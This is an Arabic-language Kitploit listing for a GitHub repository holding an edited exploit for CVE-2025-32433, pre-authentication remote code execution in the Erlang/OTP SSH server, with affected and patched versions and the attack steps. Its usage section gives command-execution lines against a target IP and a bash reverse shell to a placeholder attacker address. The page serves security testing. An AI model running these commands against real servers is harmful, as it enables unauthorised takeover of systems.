Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32433-Exploit-edited — استنادًا إلى الإصدار الأصلي:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py استبدال علامة الاختيار Unicode بحرف ASCII للتوافق مع ويندوز | Kitploit
أدوات/GitHubGitHub/chuzoux/cve-2025-32433-exploit-edited
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعد
GitHubchuzoux/cve-2025-32433-exploit-edited

CVE-2025-32433-Exploit-edited

استنادًا إلى الإصدار الأصلي:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py استبدال علامة الاختيار Unicode بحرف ASCII للتوافق مع ويندوز

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

استغلال CVE-2025-32433 (متوافق مع ويندوز)

Erlang/OTP SSH تنفيذ تعليمات برمجية عن بُعد دون مصادقة

الوصف

يحتوي هذا المستودع على استغلال لثغرة CVE-2025-32433، وهي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد دون مصادقة في خادم SSH الخاص بـ Erlang/OTP.

الميزات الرئيسية:

  • ✅ استغلال RCE قبل المصادقة
  • ✅ تم الإصلاح للتوافق مع ترميز GBK في ويندوز
  • ✅ يعمل على إصدارات Erlang/OTP ≤ 27.3.2، ≤ 26.2.5.10، ≤ 25.3.2.19

تفاصيل الثغرة

معرف CVE: CVE-2025-32433
الخطورة: حرجة
التأثير: تنفيذ تعليمات برمجية عن بُعد دون مصادقة

تسمح الثغرة للمهاجمين بتنفيذ أوامر نظام تعسفية على خوادم SSH الخاصة بـ Erlang/OTP دون مصادقة، وذلك عن طريق إرسال رسائل بروتوكول SSH مصممة خصيصًا.

الإصدارات المتأثرة

root@kitploit:~
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)

الاستخدام

root@kitploit:~
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"

# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"

# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'

# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"

الوسائط

root@kitploit:~
-t, --target    Target IP address (default: 127.0.0.1)
-p, --port      Target port (default: 2222)
-c, --command   System command to execute
-e, --erlang    Raw Erlang code to execute

إصلاح ترميز ويندوز

يعمل هذا الإصدار على إصلاح مشكلة الترميز الموجودة في الاستغلال الأصلي:

المشكلة: كان الاستغلال الأصلي يستخدم حرف علامة الصح الموحّد (✓, U+2713)، مما يسبب أخطاء ترميز GBK على ويندوز:

root@kitploit:~
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence

الحل: تم استبدال حرف Unicode بالحرف القياسي ASCII + لضمان التوافق عبر المنصات.

التفاصيل التقنية

يعمل الاستغلال من خلال:

  1. إنشاء اتصال SSH وتبادل رسالة الترحيب (banner exchange)
  2. إرسال حزمة SSH_MSG_KEXINIT
  3. فتح قناة SSH عبر SSH_MSG_CHANNEL_OPEN
  4. إرسال SSH_MSG_CHANNEL_REQUEST مع أمر exec خبيث قبل المصادقة
  5. تنفيذ أكواد Erlang تعسفية عبر os:cmd()

المراجع

  • استشارة أمان GitHub
  • إصلاح Erlang/OTP
  • RFC 4254 - بروتوكول اتصال SSH
  • ProDefense CVE-2025-32433

الإصدارات المصححة

  • OTP 27.3.3
  • OTP 26.2.5.11
  • OTP 25.3.2.20

إخلاء المسؤولية

تم توفير هذا الاستغلال لأغراض تعليمية ولاختبار الأمان المصرَّح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.

الترخيص

رخصة MIT

المؤلف

تم التعديل للتوافق مع ويندوز بواسطة chuzouX

تنزيل الأداة